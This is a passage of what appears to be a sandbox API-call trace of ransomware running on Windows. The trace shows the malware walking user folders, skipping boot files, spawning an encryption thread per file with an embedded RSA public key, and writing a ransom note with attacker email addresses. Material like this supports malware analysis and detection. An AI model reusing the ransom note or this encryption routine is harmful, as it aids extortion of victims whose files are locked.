lpString2=".") returned 1 [0161.029] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0161.029] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0161.029] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0161.029] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 0 [0161.029] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0161.029] lstrcatW (in: lpString1="C:\\Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0161.029] SetErrorMode (uMode=0x1) returned 0x1 [0161.029] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\_HELP_INSTRUCTION.TXT") returned 30 [0161.029] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0161.030] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0161.030] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1a8) returned 0x0 [0161.030] RegQueryValueExW (in: hKey=0x1a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x469280, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x469280*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0161.030] RegCloseKey (hKey=0x1a8) returned 0x0 [0161.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0161.030] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0161.030] CreateFileW (lpFileName="C:\\Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0161.030] CloseHandle (hObject=0x1a8) returned 1 [0161.030] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0161.030] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0161.030] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0161.030] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0161.031] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.031] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.031] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.031] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.031] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0161.031] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0161.031] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0161.031] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0161.031] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0161.031] SetErrorMode (uMode=0x1) returned 0x1 [0161.031] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0161.031] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.031] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.031] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0161.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0161.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0161.031] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0161.031] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.031] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.032] lstrcmpW (lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpString2="..") returned 1 [0161.032] lstrcmpW (lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpString2=".") returned 1 [0161.032] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.032] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntldr") returned 0x0 [0161.032] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTLDR") returned 0x0 [0161.032] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0161.032] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntdetect.com") returned 0x0 [0161.032] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.032] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.032] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.032] lstrcpyW (in: lpString1=0x17dfbc, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0161.032] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x168 [0161.033] Sleep (dwMilliseconds=0x96) [0161.185] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.185] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.185] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.185] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.185] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.185] lstrcmpW (lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpString2="..") returned 1 [0161.185] lstrcmpW (lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpString2=".") returned 1 [0161.185] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.185] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="ntldr") returned 0x0 [0161.185] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="NTLDR") returned 0x0 [0161.185] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0161.185] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0161.185] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.185] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.185] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.185] lstrcpyW (in: lpString1=0x17dfbc, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0161.185] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0161.186] Sleep (dwMilliseconds=0x96) [0161.340] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.340] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.340] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.341] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0161.341] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0161.341] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.341] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0161.341] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0161.341] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0161.341] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0161.341] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.341] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.341] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.341] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0161.341] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x214 [0161.342] Sleep (dwMilliseconds=0x96) [0161.496] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.497] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0161.497] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0161.497] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.497] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntldr") returned 0x0 [0161.497] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTLDR") returned 0x0 [0161.497] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0161.497] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntdetect.com") returned 0x0 [0161.497] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.497] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.497] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.497] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0161.497] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0161.498] Sleep (dwMilliseconds=0x96) [0161.652] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.652] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0161.652] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0161.653] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.653] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntldr") returned 0x0 [0161.653] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTLDR") returned 0x0 [0161.653] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0161.653] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntdetect.com") returned 0x0 [0161.653] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.653] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.653] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.653] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0161.653] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x228 [0161.653] Sleep (dwMilliseconds=0x96) [0161.809] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.809] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0161.809] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0161.809] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.809] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0161.809] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0161.809] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0161.809] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0161.809] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.809] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.809] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.809] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0161.809] lstrcpyW (in: lpString1=0x17dbbc, 